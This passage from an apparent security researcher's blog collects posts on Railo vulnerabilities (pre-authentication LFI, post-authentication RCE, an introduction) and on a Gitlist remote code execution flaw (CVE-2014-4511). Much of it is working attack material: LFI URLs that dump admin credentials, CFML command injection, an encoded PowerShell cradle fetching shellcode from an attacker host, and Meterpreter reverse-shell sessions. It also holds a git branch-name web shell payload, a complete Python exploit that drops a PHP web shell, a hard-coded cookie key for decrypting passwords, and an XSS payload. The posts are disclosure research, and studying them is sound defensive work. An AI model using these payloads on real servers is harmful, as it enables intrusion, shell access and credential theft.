Using this LFI, we can pull the railo-web.xml.cfm file, which contains the administrative password. Notice that 4.2 only dumps a hash, whilst 4.0 dumps a plaintext password. This is because versions <= 4.0 blowfish encrypt the password, and > 4.0 actually hashes it. Here’s the relevant code from Railo (ConfigWebFactory.java):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
private static void loadRailoConfig(ConfigServerImpl configServer, ConfigImpl config, Document doc) throws IOException  {
        Element railoConfiguration = doc.getDocumentElement();

        // password
        String hpw=railoConfiguration.getAttribute("pw");
        if(StringUtil.isEmpty(hpw)) {
            // old password type
            String pwEnc = railoConfiguration.getAttribute("password"); // encrypted password (reversable)
            if (!StringUtil.isEmpty(pwEnc)) {
                String pwDec = new BlowfishEasy("tpwisgh").decryptString(pwEnc);
                hpw=hash(pwDec);
            }
        }
        if(!StringUtil.isEmpty(hpw))
            config.setPassword(hpw);
        else if (configServer != null) {
            config.setPassword(configServer.getDefaultPassword());
        }

As above, they actually encrypted the password using a hard-coded symmetric key; this is where versions <= 4.0 stop. In > 4.0, after decryption they hash the password (SHA256) and use it as such. Note that the encryption/decryption is no longer the actual password in > 4.0, so we cannot simply decrypt the value to use and abuse.

Due to the configuration of the web server, we can only pull CFM files; this is fine for the configuration file, but system files prove troublesome…

The second LFI is a trivial XXE that affects versions <= 4.0, and is exploitable out-of-the-box with Metasploit. Unlike the Jetty LFI, this affects all versions of Railo, both installed and express:

Using this we cannot pull railo-web.xml.cfm due to it containing XML headers, and we cannot use the standard OOB methods for retrieving files. Timothy Morgan gave a great talk at OWASP Appsec 2013 that detailed a neat way of abusing Java XML parsers to obtain RCE via XXE. The process is pretty interesting; if you submit a URL with a jar:// protocol handler, the server will download the zip/jar to a temporary location, perform some header parsing, and then delete it. However, if you push the file and leave the connection open, the file will persist. This vector, combined with one of the other LFI’s, could be a reliable pre-authentication RCE, but I was unable to get it working.

The third LFI is just as trivial as the first two, and again stems from the pandemic problem of failing to authenticate at the URL/page level. img.cfm is a file used to, you guessed it, pull images from the system for display. Unfortunately, it fails to sanitize anything:

1
2
3
4
5
6
7
8
<cfset path="resources/img/#attributes.src#.cfm">
<cfparam name="application.adminimages" default="#{}#">
<cfif StructKeyExists(application.adminimages,path) and false>
    <cfset str=application.adminimages[path]>
<cfelse>
    <cfsavecontent variable="str" trim><cfinclude template="#path#"></cfsavecontent>
    <cfset application.adminimages[path]=str>
</cfif>

By fetching this page with attributes.src set to another CFM file off elsewhere, we can load the file and execute any tags contained therein. As we’ve done above, lets grab railo-web.xml.cfm; we can do this with the following url: http://host:8888/railo-context/admin/img.cfm?attributes.src=../../../../railo-web.xml&thistag.executionmode=start which simply returns

1
<?xml version="1.0" encoding="UTF-8"?><railo-configuration pw="d34535cb71909c4821babec3396474d35a978948455a3284fd4e1bc9c547f58b" version="4.2">

This vulnerability exists in 3.3 – 4.2.1 (latest), and is exploitable out-of-the-box on both Railo installed and Express editions. Though you can only pull CFM files, the configuration file dumps plenty of juicy information. It may also be beneficial for custom tags, plugins, and custom applications that may house other vulnerable/sensitive information hidden away from the URL.

Curiously, at first glance it looks like it may be possible to turn this LFI into an RFI. Unfortunately it’s not quite that simple; if we attempt to access a non-existent file, we see the following:

1
The error occurred in zip://C:\Documents and Settings\bryan\My Documents\Downloads\railo\railo-express-4.2.1.000-jre-win32\webapps\ROOT\WEB-INF\railo\context\railo-context.ra!/admin/img.cfm: line 29

Notice the zip:// handler. This prevents us from injecting a path to a remote host with any other handler. If, however, the tag looked like this:

1
<cfinclude>#attributes.src#</cfinclude>

Then it would have been trivially exploitable via RFI. As it stands, it’s not possible to modify the handler without prior code execution.

To sum up the LFI’s: all versions and all installs are vulnerable via the img.cfm vector. All versions and all express editions are vulnerable via the Jetty LFI. Versions <= 4.0 and all installs are vulnerable to the XXE vector. This gives us reliable LFI in all current versions of Railo.

This concludes our pre-authentication LFI portion of this assessment, which will crescendo with our final post detailing several pre-authentication RCE vulnerabilities. I expect a quick turnaround for part four, and hope to have it out in a few days. Stay tuned!

railo security - part two - post-authentication rce

24 July 2014 at 21:10

Part one – intro
Part two – post-authentication rce
Part three – pre-authentication lfi
Part four – pre-authentication rce

This post continues our dive into Railo security, this time introducing several post-authentication RCE vulnerabilities discovered in the platform. As stated in part one of this series, like ColdFusion, there is a task scheduler that allows authenticated users the ability to write local files. Whilst the existence of this feature sets it as the standard way to shell a Railo box, sometimes this may not work. For example, in the event of stringent firewall rules, or irregular file permissions, or you’d just prefer not to make remote connections, the techniques explored in this post will aid you in this manner.

PHP has an interesting, ahem, feature, where it writes out session information to a temporary file located in a designated path (more). If accessible to an attacker, this file can be used to inject PHP data into, via multiple different vectors such as a User-Agent or some function of the application itself. Railo does sort of the same thing for its Web and Server interfaces, except these files are always stored in a predictable location. Unlike PHP however, the name of the file is not simply the session ID, but is rather a quasi-unique value generated using a mixture of pseudo-random and predictable/leaked information. I’ll dive into this here in a bit.

When a change to the interface is made, or a new page bookmark is created, Railo writes this information out to a session file located at /admin/userdata/. The file is then either created, or an existing one is used, and will be named either web-[value].cfm or server-[value].cfm depending on the interface you’re coming in from. It’s important to note the extension on these files; because of the CFM extension, these files will be parsed by the CFML interpreter looking for CF tags, much like PHP will do. A typical request to add a new bookmark is as follows:

1
GET /railo-context/admin/web.cfm?action=internal.savedata&action2=addfavorite&favorite=server.request HTTP/1.1

The favorite server.request is then written out to a JSON-encoded array object in the session file, as below:

1
{'fullscreen':'true','contentwidth':'1267','favorites':{'server.request':''}}

The next question is then obvious: what if we inject something malicious as a favorite?

1
GET /railo-context/admin/web.cfm?action=internal.savedata&action2=addfavorite&favorite=<cfoutput><cfexecute name="c:\windows\system32\cmd.exe" arguments="/c dir" timeout="10" variable="output"></cfexecute><pre>#output#</pre></cfoutput> HTTP/1.1

Our session file will then read:

1
{'fullscreen':'true','contentwidth':'1267','favorites':{'<cfoutput><cfexecute name="c:\windows\system32\cmd.exe" arguments="/c dir" timeout="10" variable="output"></cfexecute><pre>##output##</pre></cfoutput>':'','server.charset':''}}

Whilst our injected data is written to the file, astute readers will note the double # around our Coldfusion variable. This is ColdFusion’s way of escaping a number sign, and will therefore not reflect our command output back into the page. To my knowledge, there is no way to obtain shell output without the use of the variable tags.

We have two options for popping this: inject a command to return a shell or inject a web shell that simply writes output to a file that is then accessible from the web root. I’ll start with the easiest of the two, which is injecting a command to return a shell.

I’ll use PowerSploit’s Invoke-Shellcode script and inject a Meterpreter shell into the Railo process. Because Railo will also quote our single/double quotes, we need to base64 the Invoke-Expression payload:

1
GET /railo-context/admin/web.cfm?action=internal.savedata&action2=addfavorite&favorite=%3A%3Ccfoutput%3E%3Ccfexecute%20name%3D%22c%3A%5Cwindows%5Csystem32%5Ccmd.exe%22%20arguments%3D%22%2Fc%20PowerShell.exe%20-Exec%20ByPass%20-Nol%20-Enc%20aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEALgA2ADoAOAAwADAAMAAvAEkAbgB2AG8AawBlAC0AUwBoAGUAbABsAGMAbwBkAGUALgBwAHMAMQAnACkA%22%20timeout%3D%2210%22%20variable%3D%22output%22%3E%3C%2Fcfexecute%3E%3C%2Fcfoutput%3E%27 HTTP/1.1

Once injected, we hit our session page and pop a shell:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
payload => windows/meterpreter/reverse_https
LHOST => 192.168.1.6
LPORT => 4444
[*] Started HTTPS reverse handler on https://0.0.0.0:4444/
[*] Starting the payload handler...
[*] 192.168.1.102:50122 Request received for /INITM...
[*] 192.168.1.102:50122 Staging connection for target /INITM received...
[*] Patched user-agent at offset 663128...
[*] Patched transport at offset 662792...
[*] Patched URL at offset 662856...
[*] Patched Expiration Timeout at offset 663728...
[*] Patched Communication Timeout at offset 663732...
[*] Meterpreter session 1 opened (192.168.1.6:4444 -> 192.168.1.102:50122) at 2014-03-24 00:44:20 -0600

meterpreter > getpid
Current pid: 5064
meterpreter > getuid
Server username: bryan-PC\bryan
meterpreter > sysinfo
Computer        : BRYAN-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32
meterpreter > 

Because I’m using Powershell, this method won’t work in Windows XP or Linux systems, but it’s trivial to use the next method for that (net user/useradd).

The second method is to simply write out the result of a command into a file and then retrieve it. This can trivially be done with the following:

1
':<cfoutput><cfexecute name="c:\windows\system32\cmd.exe" arguments="/c dir > ./webapps/www/WEB-INF/railo/context/output.cfm" timeout="10" variable="output"></cfexecute></cfoutput>'

Note that we’re writing out to the start of web root and that our output file is a CFM; this is a requirement as the web server won’t serve up flat files or txt’s.

Great, we’ve verfied this works. Now, how to actually figure out what the hell this session file is called? As previously noted, the file is saved as either web-[VALUE].cfm or server-[VALUE].cfm, the prefix coming from the interface you’re accessing it from. I’m going to step through the code used for this, which happens to be a healthy mix of CFML and Java.

We’ll start by identifying the session file on my local Windows XP machine: web-a898c2525c001da402234da94f336d55.cfm. This is stored in www\WEB-INF\railo\context\admin\userdata, of which admin\userdata is accessible from the web root, that is, we can directly access this file by hitting railo-context/admin/userdata/[file] from the browser.

When a favorite it saved, internal.savedata.cfm is invoked and searches through the given list for the function we’re performing:

1
2
3
<cfif listFind("addfavorite,removefavorite", url.action2) and structKeyExists(url, "favorite")>
    <cfset application.adminfunctions[url.action2](url.favorite) />
        <cflocation url="?action=#url.favorite#" addtoken="no" />

This calls down into application.adminfunctions with the specified action and favorite-to-save. Our addfavorite function is as follows:

1
2
3
4
5
6
<cffunction name="addfavorite" returntype="void" output="no">
        <cfargument name="action" type="string" required="yes" />
        <cfset var data = getfavorites() />
        <cfset data[arguments.action] = "" />
        <cfset setdata('favorites', data) />
    </cffunction>

Tunneling yet deeper into the rabbit hole, we move forwards into setdata:

1
2
3
4
5
6
7
8
9
<cffunction name="setdata" returntype="void" output="no">
        <cfargument name="key" type="string" required="yes" />
        <cfargument name="value" type="any" required="yes" />
        <cflock name="setdata_admin" timeout="1" throwontimeout="no">
            <cfset var data = loadData() />
            <cfset data[arguments.key] = arguments.value />
            <cfset writeData() />
        </cflock>
    </cffunction>

This function actually reads in our data file, inserts our new favorite into the data array, and writes it back down. Our question is “how do you know the file?”, so naturally we need to head into loadData:

1
2
3
 <cffunction name="loadData" access="private" output="no" returntype="any">
        <cfset var dataKey = getDataStoreName() />
            [..snip..]

And yet deeper we move, into getDataStoreName:

1
2
3
<cffunction name="getDataStoreName" access="private" output="no" returntype="string">
        <cfreturn "#request.admintype#-#getrailoid()[request.admintype].id#" />
    </cffunction>

At last we’ve reached the apparent event horizon of this XML black hole; we see the return will be of form web-#getrailoid()[web].id#, substituting in web for request.admintype.

I’ll skip some of the digging here, but lets fast forward to Admin.java:

1
2
3
4
 private String getCallerId() throws IOException {
        if(type==TYPE_WEB) {
            return config.getId();
        }

Here we return the ID of the caller (our ID, for reference, is what we’re currently tracking down!), which calls down into config.getId:

1
2
3
4
5
6
7
   @Override
    public String getId() {
        if(id==null){
            id = getId(getSecurityKey(),getSecurityToken(),false,securityKey);
        }
        return id;
    }

Here we invoke getId which, if null, calls down into an overloaded getId which takes a security key and a security token, along with a boolean (false) and some global securityKey value. Here’s the function in its entirety:

1
2
3
4
5
6
7
8
9
10
11
12
public static String getId(String key, String token,boolean addMacAddress,String defaultValue) {

    try {
        if(addMacAddress){// because this was new we could swutch to a new ecryption // FUTURE cold we get rid of the old one?
            return Hash.sha256(key+";"+token+":"+SystemUtil.getMacAddress());
        }
        return Md5.getDigestAsString(key+token);
    }
    catch (Throwable t) {
        return defaultValue;
    }
}

Our ID generation is becoming clear; it’s essentially the MD5 of key + token, the key being returned from getSecurityKey and the token coming from getSecurityToken. These functions are simply getters for private global variables in the ConfigImpl class, but tracking down their generation is fairly trivial. All state initialization takes place in ConfigWebFactory.java. Let’s first check out the security key:

1
2
3
4
5
6
7
8
9
10
11
12
private static void loadId(ConfigImpl config) {
        Resource res = config.getConfigDir().getRealResource("id");
        String securityKey = null;
        try {
            if (!res.exists()) {
                res.createNewFile();
                IOUtil.write(res, securityKey = UUIDGenerator.getInstance().generateRandomBasedUUID().toString(), SystemUtil.getCharset(), false);
            }
            else {
                securityKey = IOUtil.toString(res, SystemUtil.getCharset());
            }
        }

Okay, so our key is a randomly generated UUID from the safehaus library. This isn’t very likely to be guessed/brute-forced, but the value is written to a file in a consistent place. We’ll return to this.

The second value we need to calculate is the security token, which is set in ConfigImpl:

1
2
3
4
5
6
7
8
9
10
11
public String getSecurityToken() {
        if(securityToken==null){
            try {
                securityToken = Md5.getDigestAsString(getConfigDir().getAbsolutePath());
            }
            catch (IOException e) {
                return null;
            }
        }
        return securityToken;
    }

Gah! This is predictable/leaked! The token is simply the MD5 of our configuration directory, which in my case is C:\Documents and Settings\bryan\My Documents\Downloads\railo-express-4.0.4.001-jre-win32\webapps\www\WEB-INF\railo So let’s see if this works.

We MD5 the directory (20132193c7031326cab946ef86be8c74), then prefix this with the random UUID (securityKey) to finally get:

1
2
$ echo -n "3ec59952-b5de-4502-b9d7-e680e5e2071820132193c7031326cab946ef86be8c74" | md5sum
a898c2525c001da402234da94f336d55  -

Ah-ha! Our session file will then be web-a898c2525c001da402234da94f336d55.cfm, which exactly lines up with what we’re seeing:

I mentioned that the config directory is leaked; default Railo is pretty promiscuous:

As you can see, from this we can derive the base configuration directory and figure out one half of the session filename. We now turn our attention to figuring out exactly what the securityKey is; if we recall, this is a randomly generated UUID that is then written out to a file called id.

There are two options here; one, guess or predict it, or two, pull the file with an LFI. As alluded to in part one, we can set the error handler to any file on the system we want. As we’re in the mood to discuss post-authentication issues, we can harness this to fetch the required id file containing this UUID:

When we then access a non-existant page, we trigger the template and the system returns our file:

By combining these specific vectors and inherit weaknesses in the Railo architecture, we can obtain post-authentication RCE without forcing the server to connect back. This can be particularly useful when the Task Scheduler just isn’t an option. This vulnerability has been implemented into clusterd as an auxiliary module, and is available in the latest dev build (0.3.1). A quick example of this:

I mentioned briefly at the start of this post that there were “several” post-authentication RCE vulnerabilities. Yes. Several. The one documented above was fun to find and figure out, but there is another way that’s much cleaner. Railo has a function that allows administrators to set logging information, such as level and type and location. It also allows you to create your own logging handlers:

Here we’re building an HTML layout log file that will append all ERROR logs to the file. And we notice we can configure the path and the title. And the log extension. Easy win. By modifying the path to /context/my_file.cfm and setting the title to <cfdump var="#session#"> we can execute arbitrary commands on the file system and obtain shell access. The file is not created once you create the log, but once you select Edit and then Submit for some reason. Here’s the HTML output that’s, by default, stuck into the file:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title><cfdump var="#session#"></title>
<style type="text/css">
<!--
body, table {font-family: arial,sans-serif; font-size: x-small;}
th {background: #336699; color: #FFFFFF; text-align: left;}
-->
</style>
</head>
<body bgcolor="#FFFFFF" topmargin="6" leftmargin="6">
<hr size="1" noshade>
Log session start time Mon Jun 30 23:06:17 MDT 2014<br>
<br>
<table cellspacing="0" cellpadding="4" border="1" bordercolor="#224466" width="100%">
<tr>
<th>Time</th>
<th>Thread</th>
<th>Level</th>
<th>Category</th>
<th>Message</th>
</tr>
</table>
<br>
</body></html>

Note our title contains the injected command. Here’s execution:

Using this method we can, again, inject a shell without requiring the use of any reverse connections, though that option is of course available with the help of the cfhttp tag.

Another fun post-authentication feature is the use of data sources. In Railo, you can craft a custom data source, which is a user-defined database abstraction that can be used as a filesystem. Here’s the definition of a MySQL data source:

With this defined, we can set all client session data to be stored in the database, allowing us to harvest session ID’s and plaintext credentials (see part one). Once the session storage is set to the created database, a new table will be created (cf_session_data) that will contain all relevant session information, including symmetrically-encrypted passwords.

Part three and four of this series will begin to dive into the good stuff, where we’ll discuss several pre-authentication vulnerabilities that we can use to obtain credentials and remote code execution on a Railo host.

gitlist - commit to rce

29 June 2014 at 22:00

Gitlist is a fantastic repository viewer for Git; it’s essentially your own private Github without all the social networking and glitzy features of it. I’ve got a private Gitlist that I run locally, as well as a professional instance for hosting internal projects. Last year I noticed a bug listed on their Github page that looked a lot like an exploitable hole:

1
Oops! sh: 1: Syntax error: EOF in backquote substitution

I commented on its exploitability at the time, and though the hole appears to be closed, the issue still remains. I returned to this during an install of Gitlist and decided to see if there were any other bugs in the application and, as it turns out, there are a few. I discovered a handful of bugs during my short hunt that I’ll document here, including one anonymous remote code execution vulnerability that’s quite trivial to pop. These bugs were reported to the developers and CVE-2014-4511 was assigned. These issues were fixed in version 0.5.0.

The first bug is actually more of a vulnerability in a library Gitlist uses, Gitter (same developers). Gitter allows developers to interact with Git repositories using Object-Oriented Programming (OOP). During a quick once-over of the code, I noticed the library shelled out quite a few times, and one in particular stood out to me:

1
$hash = $this->getClient()->run($this, "log --pretty=\"%T\" --max-count=1 $branch");```

This can be found in Repository.php of the Gitter library, and is invoked from TreeController.php in Gitlist. As you can imagine, there is no sanitization on the $branch variable. This essentially means that anyone with commit access to the repository can create a malicious branch name (locally or remotely) and end up executing arbitrary commands on the server.

The tricky part comes with the branch name; git actually has a couple restrictions on what can and cannot be part of a branch name. This is all defined and checked inside of refs.c, and the rules are simply defined as (starting at line 33):

  1. Cannot begin with .
  2. Cannot have a double dot (..)
  3. Cannot contain ASCII control characters (?, [, ], ~, ^, :, \)
  4. End with /
  5. End with .lock
  6. Contain a backslash
  7. Cannot contain a space

With these restrictions in mind, we can begin crafting our payload.

My first thought was, because Gitlist is written in PHP, to drop a web shell. To do so we must print our payload out to a file in a location accessible to the web root. As it so happens, we have just the spot to do it. According to INSTALL.md, the following is required:

1
2
3
cd /var/www/gitlist
mkdir cache
chmod 777 cache

This is perfect; we have a reliable location with 777 permissions and it’s accessible from the web root (/gitlist/cache/my_shell.php). Second step is to come up with a payload that adheres to the Git branch rules while still giving us a shell. What I came up with is as follows:

1
# git checkout -b "|echo\$IFS\"PD9zeXN0ZW0oJF9SRVFVRVNUWyd4J10pOz8+Cg==\"|base64\$IFS-d>/var/www/gitlist/cache/x"

In order to inject PHP, we need the <? and ?> headers, so we need to encode our PHP payload. We use the $IFS environment variable (Internal Field Separator) to plug in our spaces and echo the base64’d shell into base64 for decoding, then pipe that into our payload location.

And it works flawlessly.

Though you might say, “Hey if you have commit access it’s game over”, but I’ve seen several instances of this not being the case. Commit access does not necessarily equate to shell access.

The second vulnerability I discovered was a trivial RCE, exploitable by anonymous users without any access. I first noticed the bug while browsing the source code, and ran into this:

1
$blames = $repository->getBlame("$branch -- \"$file\"");

Knowing how often they shell out, and the complete lack of input sanitization, I attempted to pop this by trivially evading the double quotes and injecting grave accents:

1
http://localhost/gitlist/my_repo.git/blame/master/""`whoami`

And what do you know?

Curiousity quickly overcame me, and I attempted another vector:

Faster my fingers flew:

It’s terrifyingly clear that everything is an RCE. I developed a rough PoC to drop a web shell on the system. A test run of this is below:

1
2
3
4
5
6
root@droot:~/exploits# python gitlist_rce.py http://192.168.1.67/gitlist/graymatter
[!] Using cache location /var/www/gitlist/cache
[!] Shell dropped; go hit http://192.168.1.67/gitlist/cache/x.php?cmd=ls
root@droot:~/exploits# curl http://192.168.1.67/gitlist/cache/x.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
root@droot:~/exploits# 

I’ve also developed a Metasploit module for this issue, which I’ll be submitting a PR for soon. A run of it:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
msf exploit(gitlist_rce) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.6:4444 
[*] Injecting payload...
[*] Executing payload..
[*] Sending stage (39848 bytes) to 192.168.1.67
[*] Meterpreter session 9 opened (192.168.1.6:4444 -> 192.168.1.67:34241) at 2014-06-21 23:07:01 -0600

meterpreter > sysinfo
Computer    : bryan-VirtualBox
OS          : Linux bryan-VirtualBox 3.2.0-63-generic #95-Ubuntu SMP Thu May 15 23:06:36 UTC 2014 i686
Meterpreter : php/php
meterpreter > 

Source for the standalone Python exploit can be found below.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
from commands import getoutput
import urllib
import sys

""" 
Exploit Title: Gitlist <= 0.4.0 anonymous RCE
Date: 06/20/2014
Author: drone (@dronesec)
Vendor Homepage: http://gitlist.org/
Software link: https://s3.amazonaws.com/gitlist/gitlist-0.4.0.tar.gz
Version: <= 0.4.0
Tested on: Debian 7
More information: 
cve: CVE-2014-4511
"""

if len(sys.argv) <= 1:
    print '%s: [url to git repo] {cache path}' % sys.argv[0]
    print '  Example: python %s http://localhost/gitlist/my_repo.git' % sys.argv[0]
    print '  Example: python %s http://localhost/gitlist/my_repo.git /var/www/git/cache' % sys.argv[0]
    sys.exit(1)

url = sys.argv[1]
url = url if url[-1] != '/' else url[:-1]

path = "/var/www/gitlist/cache"
if len(sys.argv) > 2:
    path = sys.argv[2]

print '[!] Using cache location %s' % path

# payload <?system($_GET['cmd']);?>
payload = "PD9zeXN0ZW0oJF9HRVRbJ2NtZCddKTs/Pgo="

# sploit; python requests does not like this URL, hence wget is used
mpath = '/blame/master/""`echo {0}|base64 -d > {1}/x.php`'.format(payload, path)
mpath = url+ urllib.quote(mpath)

out = getoutput("wget %s" % mpath)
if '500' in out:
    print '[!] Shell dropped; go hit %s/cache/x.php?cmd=ls' % url.rsplit('/', 1)[0]
else:
    print '[-] Failed to drop'
    print out

railo security - part one - intro

25 June 2014 at 21:00

Part one – intro
Part two – post-authentication rce
Part three – pre-authentication lfi
Part four – pre-authentication rce

Railo is an open-source alternative to the popular Coldfusion application server, implementing a FOSSy CFML engine and application server. It emulates Coldfusion in a variety of ways, mainly features coming straight from the CF world, along with several of it’s own unique features (clustered servers, a plugin architecture, etc). In this four-part series, we’ll touch on how Railo, much like Coldfusion, can be used to gain access to a system or network of systems. I will also be examining several pre-authentication RCE vulnerabilities discovered in the platform during this audit. I’ll be pimping clusterd throughout to exemplify how it can help achieve some of these goals. These posts are the result of a combined effort between myself and Stephen Breen (@breenmachine).

I’ll preface this post with a quick rundown on what we’re working with; public versions of Railo run from versions 3.0 to 4.2, with 4.2.1 being the latest release as of posting. The code is also freely available on Github; much of this post’s code samples have been taken from the 4.2 branch or the master. Hashes:

1
2
3
4
$ git branch
* master
$ git rev-parse master
694e8acf1a762431eab084da762a0abbe5290f49

And a quick rundown of the code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
$ cloc ./
    3689 text files.
    3571 unique files.                                          
     151 files ignored.

http://cloc.sourceforge.net v 1.60  T=7.74 s (452.6 files/s, 60622.4 lines/s)
---------------------------------------------------------------------------------
Language                       files          blank        comment           code
---------------------------------------------------------------------------------
Java                            2786          66639          69647         258015
ColdFusion                       315           5690           3089          35890
ColdFusion CFScript              352           4377            643          15856
XML                               22            526            563           5773
Javascript                        14             46            252            733
Ant                                4             38             70            176
DTD                                4            283            588            131
CSS                                5             52             16             77
HTML                               1              0              0              1
---------------------------------------------------------------------------------
SUM:                            3503          77651          74868         316652
---------------------------------------------------------------------------------

Railo has two separate administrative web interfaces; server and web. The two interfaces segregate functionality out into these categories; managing the actual server and managing the content served up by the server. Server is available at http://localhost:8888/railo-context/admin/server.cfm and web is available at http://localhost:8888/railo-context/admin/web.cfm. Both interfaces are configured with a single, shared password that is set AFTER the site has been initialized. That is, the first person to hit the web server gets to choose the password.

Authentication

As stated, authentication requires only a single password, but locks an IP address out if too many failed attempts are performed. The exact logic for this is as follows (web.cfm):

1
2
3
<cfif loginPause and StructKeyExists(application,'lastTryToLogin') and IsDate(application.lastTryToLogin) and DateDiff("s",application.lastTryToLogin,now()) LT loginPause>
        <cfset login_error="Login disabled until #lsDateFormat(DateAdd("s",loginPause,application.lastTryToLogin))# #lsTimeFormat(DateAdd("s",loginPause,application.lastTryToLogin),'hh:mm:ss')#">
    <cfelse>

A Remember Me For setting allows an authenticated session to last until logout or for a specified amount of time. In the event that a cookie is saved for X amount of time, Railo actually encrypts the user’s password and stores it as the authentication cookie. Here’s the implementation of this:

1
<cfcookie expires="#DateAdd(form.rememberMe,1,now())#" name="railo_admin_pw_#ad#" value="#Encrypt(form["login_password"&ad],cookieKey,"CFMX_COMPAT","hex")#">

That’s right; a static key, defined as <cfset cookieKey="sdfsdf789sdfsd">, is used as the key to the CFMX_COMPAT encryption algorithm for encrypting and storing the user’s password client-side. This is akin to simply base64’ing the password, as symmetric key security is dependant upon the secrecy of this shared key.

To then verify authentication, the cookie is decrypted and compared to the current password (which is also known; more on this later):

1
2
3
4
5
6
7
<cfif not StructKeyExists(session,"password"&request.adminType) and StructKeyExists(cookie,'railo_admin_pw_#ad#')>
    <cfset fromCookie=true>
    <cftry>
        <cfset session["password"&ad]=Decrypt(cookie['railo_admin_pw_#ad#'],cookieKey,"CFMX_COMPAT","hex")>
        <cfcatch></cfcatch>
    </cftry>
</cfif>

For example, if my stored cookie was RAILO_ADMIN_PW_WEB=6802AABFAA87A7, we could decrypt this with a simple CFML page:

1
2
<cfset tmp=Decrypt("6802AABFAA87A7", "sdfsdf789sdfsd", "CFMX_COMPAT", "hex")>
<cfdump var="#tmp#">

This would dump my plaintext password (which, in this case, is “default”). This ups the ante with XSS, as we can essentially steal plaintext credentials via this vector. Our cookie is graciously set without HTTPOnly or Secure: Set-Cookie: RAILO_ADMIN_PW_WEB=6802AABFAA87A7;Path=/;Expires=Sun, 08-Mar-2015 06:42:31 GMT._

Another worthy mention is the fact that the plaintext password is stored in the session struct, as shown below:

1
<cfset session["password"&request.adminType]=form["login_password"&request.adminType]>

In order to dump this, however, we’d need to be able to write a CFM file (or code) within the context of web.cfm. As a test, I’ve placed a short CFM file on the host and set the error handler to invoke it. test.cfm:

1
<cfdump var="#session#">

We then set the template handler to this file:

If we now hit a non-existent page, /railo-context/xx.cfm for example, we’ll trigger the cfm and get our plaintext password:

XSS

XSS is now awesome, because we can fetch the server’s plaintext password. Is there XSS in Railo?

Submitting to a CFM with malicious arguments triggers an error and injects unsanitized input.

Post-authentication search:

Submitting malicious input into the search bar will effectively sanitize out greater than/less than signs, but not inside of the saved form. Injecting "></form><img src=x onerror=alert(document.cookie)> will, of course, pop-up the cookie.

How about stored XSS?

A malicious mapping will trigger whenever the page is loaded; the only caveat being that the path must start with a /, and you cannot use the script tag. Trivial to get around with any number of different tags.

Speaking of, let’s take a quick look at the sanitization routines. They’ve implemented their own routines inside of ScriptProtect.java, and it’s a very simple blacklist:

1
2
3
  public static final String[] invalids=new String[]{
        "object", "embed", "script", "applet", "meta", "iframe"
    };

They iterate over these values and perform a simple compare, and if a bad tag is found, they simply replace it:

1
2
3
4
5
6
7
8
9
if(compareTagName(tagName)) {
            if(sb==null) {
                sb=new StringBuffer();
                last=0;
            }
            sb.append(str.substring(last,index+1));
            sb.append("invalidTag");
            last=endIndex;
        }

It doesn’t take much to evade this filter, as I’ve already described.

CSRF kinda fits in here, how about CSRF? Fortunately for users, and unfortunately for pentesters, there’s not much we can do. Although Railo does not enforce authentication for CFML/CFC pages, it does check read/write permissions on all accesses to the backend config file. This is configured in the Server interface:

In the above image, if Access Write was configured to open, any user could submit modifications to the back-end configuration, including password resets, task scheduling, and more. Though this is sufficiently locked down by default, this could provide a nice backdoor.

Deploying

Much like Coldfusion, Railo features a task scheduler that can be used to deploy shells. A run of this in clusterd can be seen below:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
$ ./clusterd.py -i192.168.1.219 -a railo -v4.1 --deploy ./src/lib/resources/cmd.cfml --deployer task --usr-auth default

        clusterd/0.2.1 - clustered attack toolkit
            [Supporting 6 platforms]

 [2014-05-01 10:04PM] Started at 2014-05-01 10:04PM
 [2014-05-01 10:04PM] Servers' OS hinted at windows
 [2014-05-01 10:04PM] Fingerprinting host '192.168.1.219'
 [2014-05-01 10:04PM] Server hinted at 'railo'
 [2014-05-01 10:04PM] Checking railo version 4.1 Railo Server...
 [2014-05-01 10:04PM] Checking railo version 4.1 Railo Server Administrator...
 [2014-05-01 10:04PM] Checking railo version 4.1 Railo Web Administrator...
 [2014-05-01 10:04PM] Matched 3 fingerprints for service railo
 [2014-05-01 10:04PM]   Railo Server (version 4.1)
 [2014-05-01 10:04PM]   Railo Server Administrator (version 4.1)
 [2014-05-01 10:04PM]   Railo Web Administrator (version 4.1)
 [2014-05-01 10:04PM] Fingerprinting completed.
 [2014-05-01 10:04PM] This deployer (schedule_task) requires an external listening port (8000).  Continue? [Y/n] > 
 [2014-05-01 10:04PM] Preparing to deploy cmd.cfml..
 [2014-05-01 10:04PM] Creating scheduled task...
 [2014-05-01 10:04PM] Task cmd.cfml created, invoking...
 [2014-05-01 10:04PM] Waiting for remote server to download file [8s]]
 [2014-05-01 10:04PM] cmd.cfml deployed to /cmd.cfml
 [2014-05-01 10:04PM] Cleaning up...
 [2014-05-01 10:04PM] Finished at 2014-05-01 10:04PM

This works almost identically to the Coldfusion scheduler, and should not be surprising.

One feature Railo has that isn’t found in Coldfusion is the Extension or Plugin architecture; this allows custom extensions to run in the context of the Railo server and execute code and tags. These extensions do not have access to the cfadmin tag (without authentication, that is), but we really don’t need that for a simple web shell. In the event that the Railo server is configured to not allow outbound traffic (hence rendering the Task Scheduler useless), this could be harnessed instead.

Railo allows extensions to be uploaded directly to the server, found here:

